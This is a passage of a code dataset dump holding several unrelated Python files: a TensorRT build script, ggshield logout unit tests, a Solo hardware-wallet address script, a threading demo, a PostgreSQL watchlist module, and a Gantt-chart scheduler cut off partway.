dict()\n for col in feature_dict:\n batch[col] = torch.stack([feature_dict[col]], dim=0).to(torch.int32).to(args.device)\n print(batch[col].device)\n if 'label' in batch:\n del batch['label']\n\n tensorrt_inputs = []\n for col in batch:\n tensorrt_inputs.append(\n torch_tensorrt.Input(tuple(batch[col].squeeze(-1).shape), dtype=torch.int32)\n )\n\n if fp==32:\n trt_model = torch_tensorrt.compile(traced_model, **{\n \"inputs\": tensorrt_inputs,\n \"enabled_precisions\": {torch.float32}, # Run with FP32\n \"workspace_size\": 1 << 22\n })\n\n logger.info(\"***** Build tensorrt fp32 succeeded. *****\")\n\n else:\n\n trt_model = torch_tensorrt.compile(traced_model, **{\n \"inputs\": tensorrt_inputs,\n \"enabled_precisions\": {torch.float16}, # Run with FP32\n \"workspace_size\": 1 << 22\n })\n\n logger.info(\"***** Build tensorrt fp16 succeeded. 
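# --- Hedged illustration (added; not part of the dataset record above). A
# minimal sketch of the trace-then-compile flow used by build_jit_trace and
# build_tensorrt: trace once with example int32 inputs, then hand the trace to
# torch_tensorrt.compile. The toy module and shapes below are invented for
# illustration; note also that in the record's 16-bit branch the
# "# Run with FP32" comment is stale, the enabled precision there is
# torch.float16.
import torch

class _Toy(torch.nn.Module):
    def forward(self, ids):
        return ids.float().mean(dim=-1)

_example = torch.zeros(1, 128, dtype=torch.int32)
_traced = torch.jit.trace(_Toy(), (_example,))
# Compilation itself needs a TensorRT-enabled GPU build, so it is left
# commented out in this sketch:
# import torch_tensorrt
# _trt = torch_tensorrt.compile(_traced,
#     inputs=[torch_tensorrt.Input(tuple(_example.shape), dtype=torch.int32)],
#     enabled_precisions={torch.float16},
#     workspace_size=1 << 22)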
*****\")\n\n trt_model.save(\n args.model_dir / f\"trt_model_fp{args.fp}.ts\"\n )\n return trt_model\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config_dir\", type=str, default=\"../output/wbi/org_per_bert_avg_20210925_all_ext2/model\")\n parser.add_argument(\"--device\", type=str, default='cuda')\n parser.add_argument(\"--fp\", type=int, default=16)\n args = parser.parse_args()\n device = args.device\n args = load_config(args=args)\n set_log_path(args.output_dir)\n args.device = device\n traced_model = build_jit_trace(args=args)\n build_tensorrt(args=args, traced_model=traced_model, fp=args.fp)","repo_name":"characterma/canton-target-sentiment","sub_path":"nlp_pipeline/build_tensorrt.py","file_name":"build_tensorrt.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069841721","text":"from typing import Optional, Tuple\nfrom unittest.mock import Mock\n\nimport pytest\nfrom requests.exceptions import ConnectionError\n\nfrom ggshield.__main__ import cli\nfrom ggshield.core.config import Config\nfrom ggshield.core.constants import DEFAULT_INSTANCE_URL\nfrom ggshield.core.errors import ExitCode\n\nfrom ..utils import add_instance_config\n\n\nclass TestAuthLogout:\n def test_logout_no_account_config(self, cli_fs_runner):\n \"\"\"\n GIVEN -\n WHEN using the logout command and no token is saved in the configuration\n THEN the command exits with an explanatory message\n \"\"\"\n instance_url = \"https://dashboard.gitguardian.com\"\n add_instance_config(with_account=False)\n exit_code, output = self.run_cmd(cli_fs_runner, instance_url)\n\n assert exit_code == ExitCode.UNEXPECTED_ERROR, output\n assert output == (\n f\"Error: No token found for instance {instance_url}\\n\"\n \"First try to login by running:\\n\"\n \" ggshield auth login\\n\"\n )\n\n @pytest.mark.parametrize(\n \"instance_url\", (DEFAULT_INSTANCE_URL, \"https://some-gg-instance.com\")\n )\n @pytest.mark.parametrize(\"revoke\", (True, False))\n def test_valid_logout(self, revoke, instance_url, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command\n THEN the specified instance data is erased\n AND the request for revocation is made if no flag was included\n \"\"\"\n unrelated_url = \"https://some-unrelated-gg-instance.com\"\n\n post_mock = Mock(return_value=Mock(status_code=204, ok=True))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n token_name = \"My great token\"\n add_instance_config(instance_url=instance_url, token_name=token_name)\n\n # unrelated config that should remain unchanged\n add_instance_config(instance_url=unrelated_url)\n\n exit_code, output = self.run_cmd(cli_fs_runner, instance_url, revoke=revoke)\n\n if revoke:\n post_mock.assert_called_once()\n else:\n post_mock.assert_not_called()\n\n config = Config()\n assert config.auth_config.get_instance(instance_url).account is None\n assert (\n config.auth_config.get_instance(unrelated_url).account is not None\n ), \"the unrelated instance should not be affected.\"\n\n assert exit_code == ExitCode.SUCCESS, output\n instance_url = instance_url or \"https://dashboard.gitguardian.com\"\n\n expected_output = f\"Successfully logged out for instance {instance_url}\\n\\n\"\n\n if revoke:\n expected_output += (\n \"Your personal access token has been revoked and removed \"\n \"from your configuration.\\n\"\n )\n else:\n expected_output += 
(\n \"Your personal access token has been removed \"\n \"from your configuration.\\n\"\n )\n\n assert output == expected_output\n\n def test_logout_revoke_timeout(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command (with implied token revokation)\n AND the revoke request gets a timeout\n THEN the config remains unchanged\n AND the command exits with an explanatory message\n \"\"\"\n\n post_mock = Mock(side_effect=ConnectionError(\"Http max retry\"))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n add_instance_config()\n exit_code, output = self.run_cmd(cli_fs_runner)\n\n post_mock.assert_called_once()\n config = Config()\n assert config.auth_config.get_instance(DEFAULT_INSTANCE_URL).account is not None\n\n assert exit_code == ExitCode.UNEXPECTED_ERROR, output\n assert output == (\n \"Error: Could not connect to GitGuardian.\\n\"\n \"Please check your internet connection and if the specified URL is correct.\\n\"\n )\n\n def test_logout_server_error(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command (with implied token revokation)\n AND the revoke request gets a server error response\n THEN the config remains unchanged\n AND the command exits with an explanatory message\n \"\"\"\n post_mock = Mock(return_value=Mock(status_code=500, ok=False))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n add_instance_config()\n exit_code, output = self.run_cmd(cli_fs_runner)\n\n post_mock.assert_called_once()\n config = Config()\n assert config.auth_config.get_instance(DEFAULT_INSTANCE_URL).account is not None\n\n assert exit_code == ExitCode.AUTHENTICATION_ERROR, output\n assert output == (\n \"Error: Could not perform the logout command \"\n \"because your token is already revoked or invalid.\\n\"\n \"Please try with the following command:\\n\"\n \" ggshield auth logout --no-revoke\\n\"\n )\n\n def test_logout_all(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN several saved instances\n WHEN running the logout command with --all parameter\n THEN all tokens are revoked\n AND all account configs are deleted\n \"\"\"\n post_mock = Mock(return_value=Mock(status_code=204, ok=True))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n for instance_url in [\n DEFAULT_INSTANCE_URL,\n \"https://some-gg-instance.com\",\n \"https://some-other-gg-instance.com\",\n ]:\n add_instance_config(instance_url)\n\n exit_code, output = self.run_cmd(cli_fs_runner, all_tokens=True)\n assert len(post_mock.call_args_list) == 3\n\n for instance in Config().auth_config.instances:\n assert instance.account is None, output\n\n assert exit_code == ExitCode.SUCCESS, output\n\n @staticmethod\n def run_cmd(\n cli_fs_runner,\n instance: Optional[str] = None,\n revoke: bool = True,\n all_tokens: bool = False,\n ) -> Tuple[int, str]:\n cmd = [\"auth\", \"logout\"]\n if instance is not None:\n cmd.append(\"--instance=\" + instance)\n if not revoke:\n cmd.append(\"--no-revoke\")\n if all_tokens:\n cmd.append(\"--all\")\n result = cli_fs_runner.invoke(cli, cmd, color=False)\n return result.exit_code, result.output\n","repo_name":"GitGuardian/ggshield","sub_path":"tests/unit/cmd/auth/test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"1114201700","text":"import solo\nimport 
hashlib\nimport base58\nimport sys\n\n# P value for secp256k1\np = 115792089237316195423570985008687907853269984665640564039457584007908834671663\n\nCMD_PUBKEY = 0x63\nCMD_RESET = 0x64\n\n\nclass Wallet(object):\n def __init__(self, key):\n assert (len(key) == 96)\n x = int.from_bytes(key[:32], byteorder='big')\n y = int.from_bytes(key[32:64], byteorder='big')\n\n self.key = Key(x, y, key[64:])\n\n\nclass Key(object):\n def __init__(self, x, y, chain):\n self.x = x\n self.y = y\n self.chain = chain\n\n # Check that this is a valid key\n assert ((self.x ** 3 + 7 - self.y ** 2) % p == 0)\n\n def get_compressed(self):\n prefix = b'03'\n if self.y % 2 == 0:\n prefix = b'02'\n return prefix + self.x.to_bytes(length=32, byteorder='big')\n\n def get_hash(self):\n return hash160(self.get_compressed())\n\n def get_address(self, prefix: bytes) -> str:\n # Prefix should be a byte sequence\n key_hash = self.get_hash()\n check = checksum(prefix + key_hash)\n unencoded_addr = prefix + key_hash + check\n return base58.b58encode(unencoded_addr).decode(\"ascii\")\n\n\ndef hash160(val):\n s = hashlib.sha256()\n s.update(val)\n r = hashlib.new('ripemd160')\n r.update(s.digest())\n return r.digest()\n\n\ndef checksum(val):\n s = hashlib.sha256()\n s.update(val)\n one = s.digest()\n s = hashlib.sha256()\n s.update(one)\n\n return s.digest()[:4]\n\n\nif __name__ == \"__main__\":\n # Find the Solo key\n client = solo.client.find()\n\n if len(sys.argv) > 1:\n if sys.argv[1] == \"reset\":\n print(\"Resetting device. Press the button to reset\")\n client.ctap2.device.call(CMD_RESET)\n\n wallet = Wallet(client.ctap2.device.call(CMD_PUBKEY))\n address = wallet.key.get_address(b'\\x00')\n print(f\"Address is {str(address)}\")\n","repo_name":"pta2002/solo-hw-wallet","sub_path":"btc/wallet.py","file_name":"wallet.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3958811987","text":"\"\"\"\nFile: producerconsumer2.py\nProducer-consumer demo with synchronization.\nProducer and consumer both access shared data a given number\nof times. 
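# --- Hedged illustration (added; not part of the dataset records above). A
# self-contained sketch of the Base58Check construction that Key.get_address()
# above performs: version byte + HASH160(compressed pubkey) + 4-byte
# double-SHA256 checksum.
import hashlib
import base58

def _p2pkh_address(pubkey_hash: bytes, version: bytes = b'\x00') -> str:
    payload = version + pubkey_hash
    check = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return base58.b58encode(payload + check).decode('ascii')

# Well-known vector: the all-zero HASH160 under version 0x00 encodes to the
# Bitcoin "burn" address.
assert _p2pkh_address(bytes(20)) == '1111111111111111111114oLvT2'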
They sleep a random interval before each access.\nThe data must be produced before it is consumed, and be produced\nand consumed just once.\nThe condition and Boolean flag on the shared data guarantee that\nthe producer and consumer access the data in the correct order.\n\"\"\"\n\nimport time, random\nfrom threading import Thread, currentThread, Condition\n\nclass SharedCell(object):\n \"\"\"Shared data that sequences writing before reading.\"\"\"\n \n def __init__(self):\n \"\"\"Can produce but not consume at startup.\"\"\"\n self.data = -1\n self.writeable = True\n self.condition = Condition()\n\n def setData(self, data):\n \"\"\"Second caller must wait until someone has\n consumed the data before resetting it.\"\"\"\n self.condition.acquire()\n while not self.writeable:\n self.condition.wait()\n print(\"%s setting data to %d\" % \\\n (currentThread().getName(), data))\n self.data = data\n self.writeable = False\n self.condition.notify()\n self.condition.release()\n\n def getData(self):\n \"\"\"Caller must wait until someone has produced\n the data before accessing it.\"\"\"\n self.condition.acquire()\n while self.writeable:\n self.condition.wait()\n print(\"%s accessing data %d\" % \\\n (currentThread().getName(), self.data))\n self.writeable = True\n self.condition.notify()\n self.condition.release()\n return self.data\n\nclass Producer(Thread):\n \"\"\"A producer of data in a shared cell.\"\"\"\n\n def __init__(self, cell, accessCount, sleepInterval):\n Thread.__init__(self, name = \"Producer\")\n self.accessCount = accessCount\n self.cell = cell\n self.sleepInterval = sleepInterval\n\n def run(self):\n \"\"\"Resets the data in the cell and goes to sleep,\n the given number of times.\"\"\"\n print(\"%s starting up\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepInterval))\n self.cell.setData(count + 1)\n print(\"%s is done producing\\n\" % self.getName())\n\nclass Consumer(Thread):\n \"\"\"A consumer of data in a shared cell.\"\"\"\n\n def __init__(self, cell, accessCount, sleepInterval):\n Thread.__init__(self, name = \"Consumer\")\n self.accessCount = accessCount\n self.cell = cell\n self.sleepInterval = sleepInterval\n\n def run(self):\n \"\"\"Accesses the data in the cell and goes to sleep,\n the given number of times.\"\"\"\n print(\"%s starting up\\n\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepInterval))\n value = self.cell.getData()\n print(\"%s is done consuming\\n\" % self.getName())\n\ndef main():\n accessCount = int(input(\"Enter the number of accesses: \"))\n cell = SharedCell()\n p = Producer(cell, accessCount, 4)\n c = Consumer(cell, accessCount, 4)\n print(\"Starting the threads\")\n p.start()\n c.start()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tjsaotome65/sec430-python","sub_path":"module-06/producerconsumer2.py","file_name":"producerconsumer2.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41486036280","text":"import psycopg2\r\nimport datetime\r\n\r\nurl = \"enter url here!\"\r\n\r\nCREATE_MOVIES_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS movies(\r\n id SERIAL PRIMARY KEY,\r\n title TEXT,\r\n release_timestamp REAL\r\n );\"\"\"\r\n\r\n\r\nCREATE_USERS_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS users(\r\n username TEXT PRIMARY KEY\r\n );\"\"\"\r\n\r\n\r\nCREATE_WATCHLIST_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS watchlist(\r\n watcher_name 
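# --- Hedged illustration (added; not part of the dataset record above). The
# SharedCell above is the classic condition-variable handshake; the same shape
# in modern form, using `with` on the Condition instead of the explicit
# acquire/release pairs:
from threading import Condition

class _Cell:
    def __init__(self):
        self.data, self.writeable = None, True
        self.cond = Condition()

    def put(self, value):
        with self.cond:
            while not self.writeable:      # wait until last value was consumed
                self.cond.wait()
            self.data, self.writeable = value, False
            self.cond.notify()

    def get(self):
        with self.cond:
            while self.writeable:          # wait until a value was produced
                self.cond.wait()
            self.writeable = True
            self.cond.notify()
            return self.data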
TEXT,\r\n movie_id INTEGER,\r\n FOREIGN KEY(watcher_name) REFERENCES users(username),\r\n FOREIGN KEY(movie_id) REFERENCES movies(id)\r\n );\"\"\"\r\n\r\nINSERT_MOVIES = \"INSERT INTO movies (title, release_timestamp) VALUES (%s, %s);\"\r\nINSERT_USER = \"INSERT INTO users (username) VALUES (%s);\"\r\nINSERT_WATCHED_MOVIE = \"INSERT INTO watchlist (watcher_name, movie_id) VALUES (%s,%s);\"\r\nSELECT_ALL_MOVIES = \"SELECT * FROM movies;\"\r\nSELECT_UPCOMING_MOVIES = \"SELECT * FROM movies WHERE release_timestamp > %s;\"\r\nSELECT_WATCHED_MOVIES = \"\"\"SELECT movies.title \r\nFROM movies \r\nJOIN watchlist \r\nON movies.id = watchlist.movie_id \r\nWHERE watcher_name = %s;\"\"\"\r\nDELETE_MOVIE = \"DELETE FROM MOVIES WHERE title = %s;\"\r\n\r\nconnection = psycopg2.connect(url)\r\n\r\n\r\ndef create_tables():\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(CREATE_MOVIES_TABLE)\r\n cursor.execute(CREATE_USERS_TABLE)\r\n cursor.execute(CREATE_WATCHLIST_TABLE)\r\n\r\n\r\ndef add_movie(title, release_timestamp):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(INSERT_MOVIES, (title, release_timestamp))\r\n\r\n\r\ndef add_user(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(INSERT_USER, (username,))\r\n\r\n\r\ndef get_movies(upcoming = False):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n if upcoming:\r\n today_timestamp = datetime.datetime.today().timestamp()\r\n cursor.execute(SELECT_UPCOMING_MOVIES, (today_timestamp, ))\r\n else:\r\n cursor.execute(SELECT_ALL_MOVIES)\r\n return cursor.fetchall()\r\n\r\n\r\ndef watch_movie(username, movie_id):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(INSERT_WATCHED_MOVIE, (username, movie_id))\r\n\r\n\r\ndef get_watched_movies(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(SELECT_WATCHED_MOVIES, (username,))\r\n return cursor.fetchall()\r\n\r\n\r\ndef check_username(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute('SELECT * FROM users WHERE username = %s;', (username,))\r\n return cursor.fetchall()","repo_name":"Annicheez/PostgresSQL-could-database-implementation-in-python","sub_path":"SqlDatabase.py","file_name":"SqlDatabase.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"865613335","text":"\"\"\"\nCore of simple-scheduler\n\"\"\"\nimport re\nimport random\nfrom datetime import date, timedelta, datetime\nimport logging\nfrom collections import defaultdict\n\nimport svgwrite\n# conversion from mm/cm to pixel is done by ourselves as firefox seems\n# to have a bug for big numbers...\n# 3.543307 is for conversion from mm to pt units !\nmm = 3.543307\ncm = 35.43307\n\nFONT_ATTR = {\n 'fill': 'black',\n 'stroke': 'black',\n 'stroke_width': 0,\n 'font_family': 'Verdana',\n 'font_size': 15\n }\n\nONE_DAY = timedelta(days=1)\nWEEKEND_DAYS = [5, 6]\n\ndef random_color():\n \"\"\"\n http://stackoverflow.com/questions/13998901/generating-a-random-hex-color-in-python\n \"\"\"\n r = lambda: random.randint(0,255)\n return '#%02X%02X%02X' % (r(),r(),r())\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\nclass Chart:\n \"\"\"\n Builds extremely SIMPLE gantt charts.\n\n This is designed to be a basic utility to help estimate 
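# --- Hedged illustration (added; not part of the dataset records above). The
# psycopg2 idiom used throughout SqlDatabase.py in miniature: the outer
# `with connection:` scopes a transaction (commit on success, rollback on
# error), the inner `with connection.cursor() as cursor:` closes the cursor,
# and execute() is a cursor method, not a connection method.
def _run_query(connection, sql, params=()):
    with connection:                         # transaction scope
        with connection.cursor() as cursor:  # cursor lifetime
            cursor.execute(sql, params)
            return cursor.fetchall()         # for statements returning rows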
schedules and provide a projected\n timeline for a project. As such, not all features like exact start and end dates are supported;\n instead, tasks ask for duration and follow these rules:\n - A resource (person) can never be doing two things at once\n - All dependencies must be complete before a task can begin\n - All tasks are measurable in days\n - Tasks are ordered on the chart top-to-bottom in the order they were added to projects\n\n Currently, vacations/unavailability for resources is not supported and only a single project\n may be added to a chart.\n \"\"\"\n def __init__(self, name):\n self.name = name\n self.projects = []\n self.resources = []\n self.start_date = date.today()\n\n self.work_weekends = False\n self.color = '#FF3030'\n\n def add_project(self, project):\n \"\"\"\n Adds the given project to the chart\n \"\"\"\n if project not in self.projects:\n if len(self.projects) >= 1:\n raise ValueError('Simple Gantt can only handle a single project at a time currently')\n\n self.projects.append(project)\n project.set_chart(self)\n\n def add_resource(self, resource):\n \"\"\"\n Adds the given resource to the gantt chart\n \"\"\"\n if resource not in self.resources:\n self.resources.append(resource)\n resource.set_chart(self)\n\n @property\n def skipped_days(self):\n \"\"\"\n Returns days that are NEVER worked (weekends).\n\n Can be disabled via chart.work_weekends = True\n \"\"\"\n if self.work_weekends:\n return []\n else:\n return WEEKEND_DAYS\n\n @property\n def end_date(self):\n \"\"\"\n Returns the final date any tasks will be performed.\n \"\"\"\n end_date = self.start_date\n for t in self.tasks:\n if t.end_date > end_date:\n end_date = t.end_date\n return end_date\n\n @property\n def tasks(self):\n \"\"\"\n Returns an iterator for all tasks under all projects\n \"\"\"\n for proj in self.projects:\n for t in proj.tasks:\n yield t\n\n def calculate_schedule(self):\n \"\"\"\n Calculates the start and end dates of each task\n \"\"\"\n for proj in self.projects:\n for t in proj.tasks:\n t.schedule()\n\n def save_svg(self, filename, start=None, end=None):\n \"\"\"\n Draws SVG of gantt chart\n\n Based on https://bitbucket.org/xael/python-gantt/\n \"\"\"\n self.calculate_schedule()\n\n # Clear any drawing caches\n #self._reset_coord()\n\n if start is None:\n start_date = self.start_date - ONE_DAY\n else:\n start_date = start\n\n if end is None:\n end_date = self.end_date + 3 * ONE_DAY\n else:\n end_date = end\n\n if start_date > end_date:\n raise ValueError('Unable to draw chart, start date {0} > end_date {1}'.format(start_date, end_date))\n\n # Draw calendar at top\n # How many days do we need to draw?\n maxx = (end_date - start_date).days\n dwg = _my_svgwrite_drawing_wrapper(filename, debug=True)\n\n # Get SVG for each project, but don't actually add yet to make ordering with calendar easy\n projects_svg = []\n projects_height = 0\n for proj in self.projects:\n ldwg = svgwrite.container.Group()\n psvg, pheight = proj.svg(prev_y=2, start=start_date, end=end_date)\n if psvg is not None:\n ldwg.add(psvg)\n projects_svg.append(ldwg)\n projects_height += pheight\n\n # White background and calendar\n dwg.add(svgwrite.shapes.Rect(\n insert=((0)*cm, 0*cm),\n size=((maxx+1)*cm, (projects_height+3)*cm),\n fill='white',\n stroke_width=0,\n opacity=1\n ))\n dwg.add(self._svg_calendar(maxx, projects_height, start_date, datetime.today()))\n\n # Draw each project\n for proj in projects_svg:\n dwg.add(proj)\n\n # Draw dependencies between tasks\n dep = self.svg_dependencies()\n if dep is not 
None:\n ldwg.add(dep)\n\n dwg.save(width=(maxx+1)*cm, height=(projects_height+3)*cm)\n\n def svg_dependencies(self):\n \"\"\"\n Draws svg dependencies between tasks according to coordinates cached\n when drawing tasks\n \"\"\"\n svg = svgwrite.container.Group()\n for t in self.tasks:\n trepr = t.svg_dependencies()\n if trepr is not None:\n svg.add(trepr)\n return svg\n\n def _svg_calendar(self, maxx, maxy, start_date, today=None):\n \"\"\"\n Draw calendar in svg, begining at start_date for maxx days, containing\n maxy lines. If today is given, draw a blue line at date\n\n Keyword arguments:\n maxx -- number of days, weeks, months or quarters (depending on scale) to draw\n maxy -- number of lines to draw\n start_date -- datetime.date of the first day to draw\n today -- datetime.date of day as today reference\n \"\"\"\n dwg = svgwrite.container.Group()\n\n cal = {0:'Mo', 1:'Tu', 2:'We', 3:'Th', 4:'Fr', 5:'Sa', 6:'Su'}\n\n maxx += 1\n\n vlines = dwg.add(svgwrite.container.Group(id='vlines', stroke='lightgray'))\n for x in range(maxx):\n vlines.add(svgwrite.shapes.Line(start=((x)*cm, 2*cm), end=((x)*cm, (maxy+2)*cm)))\n jour = start_date + timedelta(days=x)\n\n if not today is None and today == jour:\n vlines.add(svgwrite.shapes.Rect(\n insert=((x+0.4)*cm, 2*cm),\n size=(0.2*cm, (maxy)*cm),\n fill='#76e9ff',\n stroke='lightgray',\n stroke_width=0,\n opacity=0.8\n ))\n\n # draw vacations\n if (start_date + timedelta(days=x)).weekday() in self.skipped_days:\n vlines.add(svgwrite.shapes.Rect(\n insert=((x)*cm, 2*cm),\n size=(1*cm, maxy*cm),\n fill='gray',\n stroke='lightgray',\n stroke_width=1,\n opacity=0.7,\n ))\n\n # Current day\n vlines.add(svgwrite.text.Text('{1} {0:02}'.format(jour.day, cal[jour.weekday()][0]),\n insert=((x*10+1)*mm, 19*mm),\n fill='black', stroke='black', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15-3))\n # Year\n if jour.day == 1 and jour.month == 1:\n vlines.add(svgwrite.text.Text('{0}'.format(jour.year),\n insert=((x*10+1)*mm, 5*mm),\n fill='#400000', stroke='#400000', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15+5,\n font_weight=\"bold\"))\n # Month name\n if jour.day == 1:\n vlines.add(svgwrite.text.Text('{0}'.format(jour.strftime(\"%B\")),\n insert=((x*10+1)*mm, 10*mm),\n fill='#800000', stroke='#800000', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15+3,\n font_weight=\"bold\"))\n # Week number\n if jour.weekday() == 0:\n vlines.add(svgwrite.text.Text('{0:02}'.format(jour.isocalendar()[1]),\n insert=((x*10+1)*mm, 15*mm),\n fill='black', stroke='black', stroke_width=0,\n font_family=FONT_ATTR['font_family'],\n font_size=15+1,\n font_weight=\"bold\"))\n\n vlines.add(svgwrite.shapes.Line(start=((maxx)*cm, 2*cm), end=((maxx)*cm, (maxy+2)*cm)))\n\n hlines = dwg.add(svgwrite.container.Group(id='hlines', stroke='lightgray'))\n\n dwg.add(svgwrite.shapes.Line(start=((0)*cm, (2)*cm), end=((maxx)*cm, (2)*cm), stroke='black'))\n dwg.add(svgwrite.shapes.Line(start=((0)*cm, (maxy+2)*cm), end=((maxx)*cm, (maxy+2)*cm), stroke='black'))\n\n for y in range(2, maxy+3):\n hlines.add(svgwrite.shapes.Line(start=((0)*cm, y*cm), end=((maxx)*cm, y*cm)))\n\n return dwg\n\n def __str__(self):\n \"\"\"\n Display info on all projects under us\n \"\"\"\n s = 'Chart {} starts {}, {} resources\\nProjects:'.format(self.name, self.start_date, len(self.resources))\n for p in self.projects:\n s += '\\n' + str(p)\n return s\n\n\nclass Project:\n \"\"\"\n Collects tasks\n \"\"\"\n def __init__(self, name, chart=None):\n self.name = 
name\n self.tasks = []\n\n self.chart = None\n self.set_chart(chart)\n\n def set_chart(self, chart):\n \"\"\"\n Assigns task to given chart. Ensures chart has us included in their list.\n \"\"\"\n old_chart = self.chart\n self.chart = chart\n if old_chart != chart and self.chart is not None:\n self.chart.add_project(self)\n\n def add_task(self, task):\n \"\"\"\n Adds the given task project\n \"\"\"\n if task not in self.tasks:\n self.tasks.append(task)\n task.set_project(self)\n\n @property\n def start_date(self):\n \"\"\"\n First date a task under this project will be performed\n \"\"\"\n start_date = None\n for t in self.tasks:\n if start_date is None or start_date > t.start_date:\n start_date = t.start_date\n\n return start_date\n\n @property\n def end_date(self):\n \"\"\"\n Last date a task under this project will be performed\n \"\"\"\n end_date = None\n for t in self.tasks:\n if end_date is None or end_date < t.end_date:\n end_date = t.end_date\n\n return end_date\n\n def svg(self, prev_y=0, start=None, end=None, color=None, level=0, offset=0):\n \"\"\"\n Return (SVG code, number of lines drawn) for the project. Draws all\n tasks and add project name with a purple bar on the left side.\n\n Keyword arguments:\n prev_y -- int, line to start to draw\n start -- datetime.date of first day to draw\n end -- datetime.date of last day to draw\n color -- string of color for drawing the project\n level -- int, indentation level of the project\n scale -- drawing scale (d: days, w: weeks, m: months, q: quaterly)\n offset -- X offset from image border to start of drawing zone\n \"\"\"\n if start is None:\n start = self.start_date\n if end is None:\n end = self.end_date\n\n cy = prev_y + 1*(self.name != \"\")\n\n prj = svgwrite.container.Group()\n\n # Draw tasks\n for t in self.tasks:\n trepr, theight = t.svg(cy, start=start, end=end, color=color, level=level+1, offset=offset)\n if trepr is not None:\n prj.add(trepr)\n cy += theight\n\n fprj = svgwrite.container.Group()\n prj_bar = False\n if self.name != \"\":\n # if ((self.start_date() >= start and self.end_date() <= end)\n # or (self.start_date() >= start and (self.end_date() <= end or self.start_date() <= end))) or level == 1:\n if ((self.start_date >= start and self.end_date <= end)\n or ((self.end_date >=start and self.start_date <= end))) or level == 1:\n fprj.add(svgwrite.text.Text('{0}'.format(self.name), insert=((6*level+3+offset)*mm, ((prev_y)*10+7)*mm), fill=FONT_ATTR['fill'], stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15+3))\n\n fprj.add(svgwrite.shapes.Rect(\n insert=((6*level+0.8+offset)*mm, (prev_y+0.5)*cm),\n size=(0.2*cm, ((cy-prev_y-1)+0.4)*cm),\n fill='purple',\n stroke='lightgray',\n stroke_width=0,\n opacity=0.5\n ))\n prj_bar = True\n else:\n cy -= 1\n\n # Do not display empty tasks\n if (cy - prev_y) == 0 or ((cy - prev_y) == 1 and prj_bar):\n return (None, 0)\n\n fprj.add(prj)\n\n return (fprj, cy-prev_y)\n\n def __str__(self):\n \"\"\"\n Displays info on all tasks\n \"\"\"\n s = 'Project {} with {} tasks:'.format(self.name, len(self.tasks))\n for t in self.tasks:\n s += '\\n' + str(t)\n return s\n\n\nclass Resource:\n \"\"\"\n Resource for the gantt chart. 
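# --- Hedged illustration (added; not part of the dataset record above). The
# Project.start_date / end_date properties above are plain min/max
# aggregations over task dates; the same computation written standalone:
def _project_span(tasks):
    # tasks: iterable of objects exposing .start_date and .end_date
    starts = [t.start_date for t in tasks]
    ends = [t.end_date for t in tasks]
    return (min(starts), max(ends)) if starts else (None, None)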
I.E., a person.\n \"\"\"\n def __init__(self, name, chart=None):\n \"\"\"\n Configure required resource attributes\n \"\"\"\n self.name = name\n self.tasks = []\n\n self.chart = None\n self.set_chart(chart)\n\n # Drawing info\n self.color = random_color()\n\n def set_chart(self, chart):\n \"\"\"\n Assigns task to given chart. Ensures chart has us included in their list.\n \"\"\"\n old_chart = self.chart\n self.chart = chart\n if old_chart != chart and self.chart is not None:\n self.chart.add_resource(self)\n\n def add_task(self, task):\n \"\"\"\n Adds the given task to this resource so it knows what it's working on.\n \"\"\"\n if task not in self.tasks:\n self.tasks.append(task)\n task.add_resource(self)\n\n def is_free(self, date):\n \"\"\"\n Determines if the resource is available to work on the given day\n \"\"\"\n for task in self.tasks:\n # If a task isn't scheduled (yet), then we don't need to worry\n # about scheduling around it\n if task.is_scheduled and task.start_date <= date and task.end_date >= date:\n return False\n\n return True\n\n def __str__(self):\n \"\"\"\n Basic resource info\n \"\"\"\n return '{} with {} tasks'.format(self.name, len(self.tasks))\n\n\nclass Task:\n \"\"\"\n Task in project\n \"\"\"\n def __init__(self, name, duration, resources=[], 